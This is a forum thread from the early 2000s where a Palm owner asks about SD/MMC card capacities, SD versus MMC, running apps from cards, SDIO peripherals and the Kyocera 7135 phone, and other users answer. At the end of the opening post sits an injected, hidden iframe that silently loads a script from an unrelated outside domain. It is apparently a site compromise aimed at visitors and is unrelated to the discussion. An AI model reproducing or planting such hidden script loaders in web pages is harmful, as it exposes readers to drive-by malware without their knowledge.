+ Reply to Thread

Questions from a Palm novice

Hello all. I bought my 6035 the day it came available and have loved it ever since. It's the first and only Palm I've ever used, so suffice it to say I don't know much about the PDA world. So can anyone with a bit more Palm knowledge than me answer these?

Do these SD/MMC cards come any bigger than 128 megs?

Which is better? SD or MMC? Why?

Can we use these cards to store palm apps, or are they only good for data (MP3s, AVIs, BMPs, etc.)?

I read about the bluetooth card that's available. Any other cool cards that have functionality beyond storage capabilities?

What advantages are there with the new OS of the 7135?

And finally, I'm really glad I didn't weaken and pick up a I-300 or a Treo, since they didn't really seem to me like generational jumps, but this does. Before I start trying to pre-order this thing, I'm just wondering if anyone knows of any other upcoming superphones that might make me regret getting a 7135 6 months after it comes out? I remember hearing about Microsoft's initiative to make PDA phone systems a year ago, but have heard nothing since. There's the Thera, but that looks like it sucks, with speakerphone/earbud usage only.

Thanks much...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Questions from a Palm novice

[quote:08ab5c8a6c="Rich"]Do these SD/MMC cards come any bigger than 128 megs?[/quote:08ab5c8a6c]

I've seen Panasonic 256 and 512MB cards listed at B&amp;H PhotoVideo, but that's all I've seen. They must be new because 128 seems to be the largest most people stock. Also, the largers ones are MUCH more expensive, as opposed to being twice and 4 times more expensive. The sweet spot seems to be 128 right now, you can get a Sandisk 128 for $70 or less at Costco. Like with all memory formats, I expect the sweet spot ($/Meg) to go toward larger cards with time and all to come down in price. Maybe by the time this phone hits the stores 256Mb cards will be &lt; $100. I hope so, as 128 isn't really that big, only about 30 or so of my MP3s would fit.

[quote:08ab5c8a6c]Which is better? SD or MMC? Why?[/quote:08ab5c8a6c]
    Interesting question. Here is a web site addressing this issue for Digital Cameras: http://www.dpreview.com/reviews/minoltadimagex/page7.asp

He finds that SD cards are much faster at read/write but quite a bit more expensive. I don't know if this is still the case or if this test was limited to certain brands.

[quote:08ab5c8a6c]Can we use these cards to store palm apps, or are they only good for data (MP3s, AVIs, BMPs, etc.)?[/quote:08ab5c8a6c]

I know I've read about mapping applications that can store their data on the card, and even execute the app from the card. I think it's a lot slower though.

[quote:08ab5c8a6c]I read about the bluetooth card that's available. Any other cool cards that have functionality beyond storage capabilities?
    [/quote:08ab5c8a6c]

Network adaptors and GPS receivers come to mind. Most anything that can be done with a CF slot I suppose will be possible given the ability to make it smaller. I wonder if someone will come up with a hard drive like the IBM CF Microdrive? I'm interested in the GPS angle, as I don't think the A-GPS on board the 7135 will suffice for real-time mapping type apps. Problem is that if you stick something like that in the slot, there goes your storage space!

[quote:8b31845975="rlwhitt"]
    [quote:8b31845975]I read about the bluetooth card that's available. Any other cool cards that have functionality beyond storage capabilities?
    [/quote:8b31845975]

Network adaptors and GPS receivers come to mind. Most anything that can be done with a CF slot I suppose will be possible given the ability to make it smaller. I wonder if someone will come up with a hard drive like the IBM CF Microdrive? I'm interested in the GPS angle, as I don't think the A-GPS on board the 7135 will suffice for real-time mapping type apps. Problem is that if you stick something like that in the slot, there goes your storage space![/quote:8b31845975]

The 7135 does not have CF, just MMC/SD. I/O availability is limited in SD.

[quote:d525e79a53="HoTSynC"]The 7135 does not have CF, just MMC/SD. I/O availability is limited in SD.[/quote:d525e79a53]

You're right, I jumped the gun. I know the 7135 does not have a CF, just forgot how few pins the SDIO card has. So, no microdrive possibilities - bummer. We're left with bascially things similar to what can be done on a plain 'ole serial port, which still covers a good bit of ground, though nothing is going to be very high speed.

[quote:6dd42719fc="Rich"] Before I start trying to pre-order this thing, I'm just wondering if anyone knows of any other upcoming superphones that might make me regret getting a 7135 6 months after it comes out? [/quote:6dd42719fc]

It's inevitable that the there will be something better out or on the horizon as soon as this is released. Just the nature of the business.

It's like buying a car or computer: As soon as you take it home it's lost value and it's outdated!

The only thing I've heard about so far is that Samsung is planning a phone very similar called the Bluechip. I doubt it will be released for quite awhile, and I'm not sure that it will have all the features as the 7135.
    ... M A L I A L ...
    ... designer | mac OS X | windows XP ...
    ... email

... waiting for the big
    V to wake up and smell the smartphone....